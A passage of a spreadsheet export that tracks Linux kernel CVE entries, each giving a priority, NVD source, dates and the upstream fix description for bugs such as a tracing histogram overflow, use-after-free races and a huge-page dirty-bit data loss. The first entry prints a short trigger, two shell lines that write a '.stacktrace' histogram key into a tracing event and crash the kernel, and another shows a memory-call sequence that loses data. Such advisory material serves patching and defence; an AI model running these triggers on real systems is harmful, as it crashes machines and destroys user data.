parse_field() sets HIST_FIELD_FL_STACKTRACE from the ".stacktrace"
modifier before it looks the field name up, and nothing afterwards
checks that the name resolved to a field which holds a stacktrace.
create_hist_field() picks HIST_FIELD_FN_STACK on the strength of the
field pointer alone, which reads a __data_loc word from the record and
follows its low 16 bits as an offset into the same record.
event_hist_trigger() takes the first word there as an entry count and
copies that many longs into a 31 entry array:
	n_entries = *stack;
	memcpy(entries, ++stack, n_entries * sizeof(unsigned long));
Neither end of that copy is bounded, and the count is whatever the event
holds at the offset, so any field will do:
  # cd /sys/kernel/tracing/events/sched/sched_process_fork
  # echo 'hist:keys=parent_pid.stacktrace' &gt; trigger
  # (true)
  BUG: kernel NULL pointer dereference, address: 0000000000000008
  RIP: 0010:rb_insert_color+0x18/0x130
   timerqueue_linked_add+0x7e/0xd0
   enqueue_hrtimer+0x39/0xb0
   __hrtimer_run_queues+0x10f/0x1f0
   &lt;/IRQ&gt;
  RIP: 0010:memcpy+0xc/0x30
   event_hist_trigger+0x165/0x690
The timer interrupt landed on the rbtree the copy had already run over.
No debug options are needed for this; KASAN reports the same write as an
out-of-bounds read of 13835058055416381440 bytes.
Documentation/trace/histogram.rst already states the rule, "must be a
long[] type", so enforce it once the name has been resolved. Names which
resolve to no field at all, "hitcount.stacktrace" and the common_*
pseudo-fields, are refused for the same reason: they hold no stacktrace
to read.</t>
        </is>
      </c>
      <c r="T582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97936</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97938</t>
        </is>
      </c>
      <c r="D583" s="5" t="inlineStr"/>
      <c r="E583" s="5" t="inlineStr"/>
      <c r="F583" s="5" t="inlineStr"/>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="inlineStr"/>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q583" s="5" t="inlineStr"/>
      <c r="R583" s="5" t="inlineStr"/>
      <c r="S583" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
reboot: fix cad_pid use-after-free race
cad_pid is a single kernel-wide struct pid pointer. proc_do_cad_pid()
reads it and passes it to pid_vnr() without protecting the lifetime of
the referenced struct pid. A concurrent writer can replace cad_pid and
drop the final reference to the old struct pid after the reader has
loaded the pointer but before pid_vnr() has finished dereferencing it,
causing a use-after-free.
kill_cad_pid() has the same lifetime race when it passes cad_pid to
kill_pid().
At the time this issue was reported, an unprivileged user could reach the
sysctl through user and PID namespaces because cad_pid was registered in
pid_table[]. Moving cad_pid back to the global reboot sysctl table
corrected that namespace and permission mismatch, but did not fix the
underlying lifetime race.
Fix this by treating cad_pid as an RCU-protected pointer at both read
sites and by waiting for a grace period before dropping the old reference
on the write side.
call_rcu(&amp;old_pid-&gt;rcu, ...) cannot be used here because free_pid()
also queues pid-&gt;rcu; queueing the same rcu_head twice can corrupt the
RCU callback list.
Original KASAN crash stack:
  kernel/pid.c:545 pid_nr_ns()        # reads freed pid-&gt;level
  kernel/pid.c:556 pid_vnr()          # calls pid_nr_ns()
  kernel/pid.c:775 proc_do_cad_pid()  # calls pid_vnr(cad_pid)</t>
        </is>
      </c>
      <c r="T583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97938</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97939</t>
        </is>
      </c>
      <c r="D584" s="5" t="inlineStr"/>
      <c r="E584" s="5" t="inlineStr"/>
      <c r="F584" s="5" t="inlineStr"/>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="inlineStr"/>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q584" s="5" t="inlineStr"/>
      <c r="R584" s="5" t="inlineStr"/>
      <c r="S584" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipmr: account multicast table and route memory
A netadmin in a user+net namespace can create many IPv4 and IPv6
multicast routing tables with MRT_TABLE and MRT6_TABLE. Each unseen
id allocates an mr_table via the shared mr_table_alloc(), links it
into the per-net list, and leaves it until netns teardown. Those
objects were not charged to memcg, so the host unreclaimable slab
grows with the table count.
Account mr_table allocations with GFP_KERNEL_ACCOUNT and mark the
IPv4/IPv6 MFC caches SLAB_ACCOUNT. This matches the established
handling of IP addresses, routes and alternate interface names.
Unresolved MFC entries are still allocated from softIRQ with
GFP_ATOMIC and are not charged. They expire after 10 seconds and are
bounded by the socket receive queue; see commit 0079ad8e8dc3
("ipmr: remove hard code cache_resolve_queue_len limit").</t>
        </is>
      </c>
      <c r="T584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97939</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97942</t>
        </is>
      </c>
      <c r="D585" s="5" t="inlineStr"/>
      <c r="E585" s="5" t="inlineStr"/>
      <c r="F585" s="5" t="inlineStr"/>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="inlineStr"/>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q585" s="5" t="inlineStr"/>
      <c r="R585" s="5" t="inlineStr"/>
      <c r="S585" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/alternatives: Exclude text poking against change_page_attr()
From time to time, the following BUG can be observed
in the x86 alternatives patching code [0]:
  &gt; kernel BUG at arch/x86/kernel/alternative.c:2576!
  &gt; Oops: invalid opcode: 0000 [#1] SMP NOPTI
  &gt; CPU: 0 UID: 0 PID: 355 Comm: (udev-worker) Not tainted 7.1.3-1-default #1 PREEMPT(full) openSUSE Tumbleweed  8c1795b03ec64f997e57a8ad38b1161e3b98da64
  &gt; Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS unknown 02/02/2022
  &gt; RIP: 0010:__text_poke+0x2aa/0x450
  &gt; Call Trace:
  &gt;  &lt;TASK&gt;
  &gt;  smp_text_poke_batch_finish+0x2a7/0x320
  &gt;  __static_call_transform+0xb7/0x220
  &gt;  arch_static_call_transform+0x5b/0xb0
  &gt;  __static_call_init+0xe9/0x270
  &gt;  static_call_module_notify+0x11f/0x150
  &gt;  notifier_call_chain+0x61/0xe0
  &gt;  blocking_notifier_call_chain_robust+0x63/0xc0
  &gt;  load_module+0x1c92/0x20c0
  &gt;  init_module_from_file+0xd8/0x140
  &gt;  idempotent_init_module+0x100/0x2f0
  &gt;  __x64_sys_finit_module+0x71/0xe0
  &gt;  do_syscall_64+0xe1/0x610
  &gt;  entry_SYSCALL_64_after_hwframe+0x76/0x7e
which matches the following BUG_ON() in alternative.c:
	/*
	 * If something went wrong, crash and burn since recovery paths are not
	 * implemented.
	 */
	BUG_ON(!pages[0] || (cross_page_boundary &amp;&amp; !pages[1]));
This can happen if vmalloc_to_page() fails, for any reason. Such can happen
if text poking races with CPA, which can possibly result in the collapsing
of page tables (or breaking of PMD hugepages). It is not a problem for most
users of vmalloc_to_page() (they solely own the vmalloc'd range) but, when
CONFIG_ARCH_HAS_EXECMEM_ROX=y, various modules own a single execmem vmalloc
range, and can call set_memory_*() in parallel on it. This can happen to
race against __text_poke and cause havoc in vmalloc_to_page().
Fix it by excluding against CPA using the init_mm mmap read lock.
[ dhansen: Fix up SoB ordering. The actual code flow here was:
	   Pedro=&gt;Lorenzo=&gt;Mike=&gt;Me which is reflected in the SoB chain
	   now. I *believe* Mike simply picked up Lorenzo's update to
	   Pedro's post from the Link ]</t>
        </is>
      </c>
      <c r="T585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97942</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97943</t>
        </is>
      </c>
      <c r="D586" s="5" t="inlineStr"/>
      <c r="E586" s="5" t="inlineStr"/>
      <c r="F586" s="5" t="inlineStr"/>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="inlineStr"/>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q586" s="5" t="inlineStr"/>
      <c r="R586" s="5" t="inlineStr"/>
      <c r="S586" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm/pat: Acquire init_mm write lock on collapse to avoid UAF
x86 implements page attribute modification using its Change Page
Attributes (CPA) mechanism.
This tracks properties of ranges such as cache mode through x86 page
attributes, and as part of that logic manipulates kernel page tables.
Since commit:
  41d88484c71c ("x86/mm/pat: restore large ROX pages after fragmentation")
ranges of kernel page table entries can be collapsed into
huge page table entries as part of this logic.
As part of this collapse, it frees the page tables which the collapsed
entries previously pointed to, and it does so without any relevant locks
being held to preclude concurrent kernel page table walkers.
The only way this code can be reached is if CPA_COLLAPSE is specified, and
this is only set in set_memory_rox() via:
set_memory_rox()
-&gt; change_page_attr_set_clr()
-&gt; cpa_flush()
-&gt; cpa_collapse_large_pages()
Notable users of this are execmem and BPF when manipulating executable
mappings.
However, this is problematic for ptdump as it walks ranges it does not own
and thus runs the risk of a use-after-free on page tables freed underneath
it.
In addition, concurrent CPA collapse operations are possible which can also
cause races.
Resolve the issue by acquiring the mmap write lock on init_mm across the
whole operation.
It is safe to acquire a sleeping lock as all the callers invoke
set_memory_rox() from process context and in any case,
change_page_attr_set_clr() calls vm_unmap_alias() which ultimately takes a
mutex, disallowing atomic context here.</t>
        </is>
      </c>
      <c r="T586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97943</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97944</t>
        </is>
      </c>
      <c r="D587" s="5" t="inlineStr"/>
      <c r="E587" s="5" t="inlineStr"/>
      <c r="F587" s="5" t="inlineStr"/>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="inlineStr"/>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr"/>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q587" s="5" t="inlineStr"/>
      <c r="R587" s="5" t="inlineStr"/>
      <c r="S587" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/cfi: Fix FineIBT hash offset in cfi_get_func_hash()
The switch of the FineIBT preamble from "subl $hash, %r10d" to the
shorter "subl $hash, %eax" moved the hash immediate from offset 7 to
offset 5 of the preamble. fineibt_preamble_hash was updated to match,
but the open-coded offset in cfi_get_func_hash() was missed and it
still reads the hash at offset 7.
cfi_get_func_hash() is used by the BPF JIT to give a struct_ops
trampoline the CFI hash of the stub function it stands in for. With
FineIBT the trampoline now gets the upper half of the real hash
followed by the first two bytes of the next instruction, so the first
indirect call from the kernel into a struct_ops program,
tcp_init_congestion_control() calling -&gt;init() of a BPF congestion
control for example, fails the FineIBT check and the kernel dies with
a CFI failure.
Move the FineIBT preamble template and its offset defines above
cfi_get_func_hash() and use fineibt_preamble_hash there, so every
reader of the preamble shares one definition of its layout. The
CFI_FINEIBT arm is only built with CONFIG_FINEIBT, the only
configuration in which cfi_mode can take that value.
cfi_get_func_arity() does not need the same treatment: the __bhi_args
call whose displacement it reads still ends at the function address.</t>
        </is>
      </c>
      <c r="T587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97944</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97945</t>
        </is>
      </c>
      <c r="D588" s="5" t="inlineStr"/>
      <c r="E588" s="5" t="inlineStr"/>
      <c r="F588" s="5" t="inlineStr"/>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="inlineStr"/>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr">
        <is>
          <t>hp</t>
        </is>
      </c>
      <c r="K588" s="5" t="inlineStr"/>
      <c r="L588" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q588" s="5" t="inlineStr"/>
      <c r="R588" s="5" t="inlineStr"/>
      <c r="S588" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm: Fix user-space data loss with MADV_FREE and THP
Some of users of Polars (a data analytics library) have lost production
data from this bug. They seem to have just the right combination of
huge pages, MADV_FREE and heavy reclaim pressure.
pmd_modify() masks the old value with (_HPAGE_CHG_MASK &amp; ~_PAGE_DIRTY),
silently discarding the hardware dirty bit.  The subsequent
pmd_mksaveddirty() call is supposed to transfer _PAGE_DIRTY into
_PAGE_SAVED_DIRTY when write-protecting, but the dirty bit was already
stripped from the value, so there is nothing left to transfer.
Contrast with pte_modify(), which keeps _PAGE_DIRTY_BITS in its mask,
and pud_modify(), which keeps _HPAGE_CHG_MASK untouched: pmd_modify()
is the odd one out.  Any pmd_modify() on a writable, dirty PMD loses
the dirty state.
One visible consequence is data loss with MADV_FREE on PMD-mapped THP:
    memset(buf, 0x5A, size);          // PMD-mapped THP, PMD dirty
    madvise(buf, size, MADV_FREE);    // PMD cleaned but left writable,
                                      // folio marked lazyfree
    memset(buf, 0x5A, size);          // hardware sets _PAGE_DIRTY again
    mprotect(buf, size, PROT_READ);   // pmd_modify() drops the dirty bit
    mprotect(buf, size, PROT_READ|PROT_WRITE);
    // ... memory pressure ...
Reclaim (e.g. under memcg pressure) then finds the lazyfree folio with
no dirty bit set anywhere and frees it in
__discard_anon_folio_pmd_locked(), even though the data was rewritten
after MADV_FREE; subsequent reads fault in fresh zero pages.  NUMA
hinting alone can trigger the same loss, as do_huge_pmd_numa_page()
restores the PMD through pmd_modify() as well.
PMD-mapped file THPs are affected too: mprotect()/NUMA hinting dropping
the dirty bit means rewritten data is never written back.
Fix it by keeping _PAGE_DIRTY in the preserved mask, exactly like
pte_modify() and pud_modify() do.  The existing
pmd_mksaveddirty()/pmd_clear_saveddirty() pair then performs the
hardware-dirty &lt;-&gt; saved-dirty transition based on the write bit,
preserving the shadow-stack encoding rules.</t>
        </is>
      </c>
      <c r="T588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97945</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97946</t>
        </is>
      </c>
      <c r="D589" s="5" t="inlineStr"/>
      <c r="E589" s="5" t="inlineStr"/>
      <c r="F589" s="5" t="inlineStr"/>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="inlineStr"/>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr">
        <is>
          <t>tempo, go</t>
        </is>
      </c>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q589" s="5" t="inlineStr"/>
      <c r="R589" s="5" t="inlineStr"/>
      <c r="S589" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/amd_node: Fix PCI device reference counting in amd_smn_init()
The local "root" pointer is a temporary variable used during the device
search. Therefore, refcount related to the search iterators should be cleaned
up after the search is complete.
Use the __free() cleanup macro to ensure the refcount is decremented when the
temporary pointer goes out of scope.
Additionally, increment the refcount when caching a root pointer. This ensures
the in-use refcount is separate from the temporary search refcounting.
Finally, drop the redundant "root = NULL" before the second search loop. The
pci_get_class() iterator always decrements the refcount of its "from"
argument, so the first loop can only fall through with "root" already NULL.</t>
        </is>
      </c>
      <c r="T589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97946</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97947</t>
        </is>
      </c>
      <c r="D590" s="5" t="inlineStr"/>
      <c r="E590" s="5" t="inlineStr"/>
      <c r="F590" s="5" t="inlineStr"/>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="inlineStr"/>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q590" s="5" t="inlineStr"/>
      <c r="R590" s="5" t="inlineStr"/>
      <c r="S590" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/amd_node: Fix potential NULL pointer dereference
amd_smn_read/write() are exported functions around __amd_smn_rw(), so
they are always available even if amd_smn_init() fails. In that case,
'amd_roots' is NULL and __amd_smn_rw() will access uninitialized memory.
Then, commit:
  83518453074d ("x86/amd_node: Add SMN offsets to exclusive region access")
added the 'smn_exclusive' flag, which indicated the calls to
pci_request_config_region_exclusive() succeeded, to prevent
concurrent userspace access.
Commit:
  0a4b61d9c2e4 ("x86/amd_node: Fix AMD root device caching")
re-ordered initialization so pci_request_config_region_exclusive() is
called earlier and a failure exits amd_smn_init() before allocating
'amd_roots'. The setting of 'smn_exclusive' moved to the end of
amd_smn_init(), after 'amd_roots' is allocated. It became redundant
and can be removed.
Replace 'smn_exclusive' with directly checking 'amd_roots', to fix a
potential NULL pointer dereference and to simplify the logic.
  [ bp: Reorg commit message, touchup comment. ]
  [ mingo: Rebase &amp; further touchups. ]</t>
        </is>
      </c>
      <c r="T590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97947</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97948</t>
        </is>
      </c>
      <c r="D591" s="5" t="inlineStr"/>
      <c r="E591" s="5" t="inlineStr"/>
      <c r="F591" s="5" t="inlineStr"/>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="inlineStr"/>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K591" s="5" t="inlineStr"/>
      <c r="L591" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q591" s="5" t="inlineStr"/>
      <c r="R591" s="5" t="inlineStr"/>
      <c r="S591" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
powerpc/eeh: Fix recursive locking on devices without EEH sensitive driver
The commit 1010b4c012b0 ("powerpc/eeh: Make EEH driver device hotplug
safe") refactored the EEH code such that the pci_rescan_remove_lock is
held at the beginning of eeh_handle_normal_event() and the
eeh_reset_device() is called with that lock being held. Looks like the
commit missed to remove the existing lock/unlock inside eeh_rmv_device()
which is no longer necessary. This is causing the eehd to hang on the
lock which it actually holds when that code path is taken.
[&lt;0&gt;] 0xc00000011c78f870
[&lt;0&gt;] __switch_to+0xfc/0x1a0
[&lt;0&gt;] pci_lock_rescan_remove+0x30/0x44
[&lt;0&gt;] eeh_rmv_device+0x290/0x2e0
[&lt;0&gt;] eeh_pe_dev_traverse+0x80/0x130
[&lt;0&gt;] eeh_reset_device+0xcc/0x23c
[&lt;0&gt;] eeh_handle_normal_event+0x830/0xa80
[&lt;0&gt;] eeh_event_handler+0xf8/0x190
[&lt;0&gt;] kthread+0x194/0x1b0
[&lt;0&gt;] start_kernel_thread+0x14/0x18
The issue is seen for cases where the errors are detected on the PHB
directly AND|OR for devices where the driver error_detected() returns
PCI_ERS_RESULT_NEED_RESET, and driver being not EEH sensitive(i.e no
error handlers like slot_reset(), resume() etc defined).</t>
        </is>
      </c>
      <c r="T591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97948</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97949</t>
        </is>
      </c>
      <c r="D592" s="5" t="inlineStr"/>
      <c r="E592" s="5" t="inlineStr"/>
      <c r="F592" s="5" t="inlineStr"/>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="inlineStr"/>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q592" s="5" t="inlineStr"/>
      <c r="R592" s="5" t="inlineStr"/>
      <c r="S592" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
configfs: unhash the dentry before dropping the item in rmdir
configfs_get_config_item() treats a hashed dentry as proof that
sd-&gt;s_element is a live config_item.  configfs_rmdir() breaks that:
simple_rmdir() leaves the dentry hashed, the last reference to the item is
dropped right after, and the dentry is only unhashed by d_delete() once
-&gt;rmdir() has returned.  configfs_symlink() resolves its target holding no
lock on it, so get_target() can land in that window:
  BUG: KASAN: slab-use-after-free in config_item_get+0x26/0x90
   get_target fs/configfs/symlink.c:128 [inline]
   configfs_symlink+0x4ab/0x1030 fs/configfs/symlink.c:185
Unhash in configfs_remove_dir(), while the item is still guaranteed to be
there.  A reference obtained just before that stays harmless, as
create_link() rechecks CONFIGFS_USET_DROPPING, already set by
configfs_detach_prep().  Both configfs_unregister_subsystem() paths
d_drop() after detaching, so this only makes rmdir match them.</t>
        </is>
      </c>
      <c r="T592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97949</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97950</t>
        </is>
      </c>
      <c r="D593" s="5" t="inlineStr"/>
      <c r="E593" s="5" t="inlineStr"/>
      <c r="F593" s="5" t="inlineStr"/>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="inlineStr"/>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr"/>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q593" s="5" t="inlineStr"/>
      <c r="R593" s="5" t="inlineStr"/>
      <c r="S593" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
configfs: pin the symlink target's dirent instead of chasing -&gt;ci_dentry
create_link() reads the target's configfs_dirent from
item-&gt;ci_dentry-&gt;d_fsdata, relying on the item reference taken by
get_target().  That reference pins the item, not its dentry: the dentry is
pinned by DCACHE_PERSISTENT, which configfs_remove_dir() releases via
simple_rmdir() while the item is still alive.  A symlink racing with rmdir
of its target can therefore find -&gt;ci_dentry freed and its dirent
released, triggering WARN_ON(!atomic_read(&amp;sd-&gt;s_count)) in configfs_get().
Take the dirent in get_target() as well, under -&gt;d_lock and atomically
with the item reference, and pass it down to create_link().  A hashed
dentry has not been killed yet, so its -&gt;d_fsdata reference keeps the
dirent alive there.</t>
        </is>
      </c>
      <c r="T593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97950</t>
        </is>
      </c>
    </row>
    <row r="594">
